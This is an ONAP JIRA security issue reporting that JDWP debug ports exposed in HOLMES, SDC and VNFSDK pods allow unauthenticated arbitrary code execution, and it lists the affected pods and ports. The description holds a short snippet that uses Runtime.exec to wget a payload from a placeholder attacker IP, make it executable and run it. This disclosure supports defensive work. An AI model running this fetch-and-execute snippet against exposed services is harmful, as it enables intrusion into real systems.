Uploaded image for project: 'ONAP JIRA Security Issues'
  1. ONAP JIRA Security Issues
  2. OJSI-10

Some ONAP services exposes JDWP outside of pod which allows for arbitrary code execution

CloneClone templateClone+Clone++
    XMLWordPrintable

Details

    • Epic
    • Status: Confirmed
    • High
    • Resolution: Unresolved
    • None
    • El Alto Release
    • JDWP exposure

    Description

      JDWP protocol exposed outside of pod allows for arbitrary code execution
      using below snipet:
      print new java.lang.Runtime().exec("wget http://<attackerip>/payload")
      print new java.lang.Runtime().exec("chmod +x payload")
      print new java.lang.Runtime().exec("./payload")

       

      Impact description (draft)

      Title: Some ONAP services exposes JDWP outside of pod which allows for arbitrary code execution

      Reporter: Radosław Żeszczuk from Samsung

      Products: HOLMES, SDC, VNFSDK

      Affects: Dublin and earlier, Casablanca and earlier (depending on a product)

      Description:

      Radosław Żeszczuk from Samsung reported number of  vulnerabilities in HOLMES, SDC, VNFSDK. By accessing ports:

      • 9202 of dep-holmes-engine-mgmt pod (before Dublin)
      • 4000 of demo-sdc-sdc-be pod
      • 6000 of demo-sdc-sdc-fe pod
      • 4001 of demo-sdc-sdc-onboarding-be pod
      • 7001 of demo-sdc-sdc-wfd-be pod
      • 7000 of demo-sdc-sdc-wfd-fe pod
      • 8000 of demo-vnfsdk-vnfsdk

      an unauthenticated attacker who already has access to pod to pod communication may execute arbitrary code inside those pods. All OOM ONAP setups are affected.

      Attachments

        No reviews matched the request. Check your Options in the drop-down menu of this sections header.

        Activity

          People

            kopasiak Krzysztof Opasiak
            mtnskiier Jim Baker
            . . . .
            Votes:
            0 Vote for this issue
            Watchers:
            3 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: